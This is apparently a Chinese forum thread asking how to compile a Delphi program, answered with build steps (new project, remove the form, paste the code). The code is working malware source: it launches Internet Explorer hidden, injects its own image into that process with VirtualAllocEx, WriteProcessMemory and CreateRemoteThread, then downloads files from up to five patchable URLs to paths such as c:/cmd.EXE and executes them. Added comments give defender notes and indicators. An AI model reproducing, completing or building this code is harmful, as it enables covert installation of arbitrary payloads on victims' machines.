这样的代码怎么编译啊! ( 积分: 50 )

// Form-less Delphi program; the only unit it uses is Windows.
// Read as a whole, the listing is a downloader that copies its own image into
// an Internet Explorer process and runs the download from there.
program main;

// Non-default preferred load address for this executable. Inject (below)
// re-creates the image at the very same address inside another process, so the
// unusual base is presumably chosen so that address range is free in the
// target - confirm against a sample.
{$IMAGEBASE $13140000}

uses
Windows;

// Links an external object file. Its contents are not shown on this page, so
// nothing can be said here about what it adds to the binary.
{$L 'SRT.obj'}

const
// Five fixed-size placeholder strings, distinguishable by their first letter
// (A..E). The main block uses each one as a download URL unless it equals 'NO'.
// NOTE(review): the constant-length 'X' padding looks like slots that are
// patched in the compiled file afterwards - confirm. The A..E + 'X' runs are a
// convenient static string signature for unconfigured copies.
Buffer1: PChar= 'AXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
Buffer2: PChar= 'BXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
Buffer3: PChar= 'CXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
Buffer4: PChar= 'DXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
Buffer5: PChar= 'EXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';


var
// Function pointers filled in at run time by Downain via GetProcAddress
// ('ShellExecuteA' and 'URLDownloadToFileA'), plus the two library handles.
ShellRun: function(hWnd: HWND; Operation, FileName, Parameters, Directory: PChar; ShowCmd: Integer): Cardinal; stdcall;
DownFile: function(Caller: pointer; URL: PChar; FileName: PChar; Reserved: LongWord; StatusCB: pointer): Longint; stdcall;
hShell, hUrlmon: THandle;

var
// Runl   : URL to fetch (set from one of the Buffer constants in the main block).
// WINXP  : local path the download is written to and then opened from.
Runl: PChar;
WINXP: PChar;

// Download-and-execute routine. RunInject hands the address of this procedure
// to Inject as the remote thread entry point, so the body is meant to run
// inside the injected process rather than in the original one.
// It reads the globals Runl (URL) and WINXP (local path); these are set by the
// main block before the image is copied.
// No return value is checked anywhere in this routine.
// Defender notes:
//  - The two APIs are resolved by name with GetProcAddress, so they will
//    probably not appear in the import table; the name strings
//    'urlmon.dll', 'URLDownloadToFileA' and 'ShellExecuteA' stay visible in
//    the binary.
//  - At run time the HTTP request and the new file under c:/ are attributed to
//    the host process this code was copied into, not to the original program.
procedure Downain; // download routine
begin
// Return values discarded; only Shell32 and urlmon handles are kept.
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell := LoadLibrary('Shell32.dll');
hUrlmon := LoadLibrary('urlmon.dll');
@ShellRun := GetProcAddress(hShell, 'ShellExecuteA');
@DownFile := GetProcAddress(hUrlmon, 'URLDownloadToFileA');
// Fetch the URL in Runl and write it to the path in WINXP.
Downfile(nil, Runl, WINXP, 0, nil);
// 'open' the downloaded file; 5 is SW_SHOW.
ShellRun(0, 'open', WINXP, nil, nil, 5);
// Ends the process this thread is running in.
ExitProcess(0);
end;

// Copies this program's whole in-memory image into another process at the same
// base address and starts a thread there.
//   ProcessHandle : handle to the target process (opened by RunInject with
//                   PROCESS_ALL_ACCESS).
//   EntryPoint    : address, inside this image, where the remote thread starts.
// None of the API results are checked, and the thread handle returned by
// CreateRemoteThread is discarded.
// Defender notes: the observable sequence is a cross-process VirtualAllocEx
// with PAGE_EXECUTE_READWRITE, a WriteProcessMemory of the full image, then
// CreateRemoteThread against the same target. The result in the target is a
// private read-write-execute region that begins with a PE header and is not
// backed by a file on disk.
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
// Base address of the running executable.
Module := Pointer(GetModuleHandle(nil));
// Walk DOS header -> PE signature -> file header -> optional header and read
// SizeOfImage, i.e. the size of the mapped image.
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
// Attempt to release whatever occupies that address in the target.
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
// Request the same address range in the target, RWX.
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Copy headers, code and data in one write.
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
// Start the remote thread; Module is passed as the thread parameter.
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;


// Starts Internet Explorer with a hidden window, locates an IE window, opens
// its owning process and calls Inject with Downain as the entry point.
// Defender notes:
//  - IEXPLORE.EXE launched hidden (sw_hide) by a non-browser parent, followed
//    shortly by that parent opening it with PROCESS_ALL_ACCESS, is the
//    process-level trace of this routine.
//  - FindWindow matches on the class name 'IEFrame' only, so the process that
//    ends up being opened is whichever IE window is found, not necessarily the
//    instance launched one line earlier.
//  - No result is checked; PID is not initialised before the lookup.
procedure RunInject;
var
ProcessHandle, PID: longword;
begin
winexec('C:/Program Files/Internet Explorer/IEXPLORE.EXE', sw_hide);
// Fixed half-second wait before looking for the window.
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Downain);
CloseHandle(ProcessHandle);
end;


// Program body: for each of the five Buffer slots that is not 'NO', set the
// URL (Runl) and a fixed drop path (WINXP), then run the launch-and-inject
// sequence once. Up to five IE launches and injections can therefore occur in
// a row.
// File-system indicators taken from this listing (all in the root of C:):
//   c:/12.EXE, c:/dir.EXE, c:/cmd.EXE, c:/root.EXE, c:/diy.EXE
// Several of these reuse the base names of familiar system commands.
begin
if Buffer1 <> 'NO' then
begin
Runl := Buffer1;
WINXP :='c:/12.EXE';
RunInject;
end;
if Buffer2 <> 'NO' then
begin
Runl := Buffer2;
WINXP :='c:/dir.EXE';
RunInject;
end;
if Buffer3 <> 'NO' then
begin
Runl := Buffer3;
WINXP :='c:/cmd.EXE';
RunInject;
end;
if Buffer4 <> 'NO' then
begin
Runl := Buffer4;
WINXP :='c:/root.EXE';
RunInject;
end;
if Buffer5 <> 'NO' then
begin
Runl := Buffer5;
WINXP :='c:/diy.EXE';
RunInject;
end;


end.
 
新建一个工程,去掉form,先把原来的都删除,
这些代码粘贴到工程的代码,然后就可以编译了。
 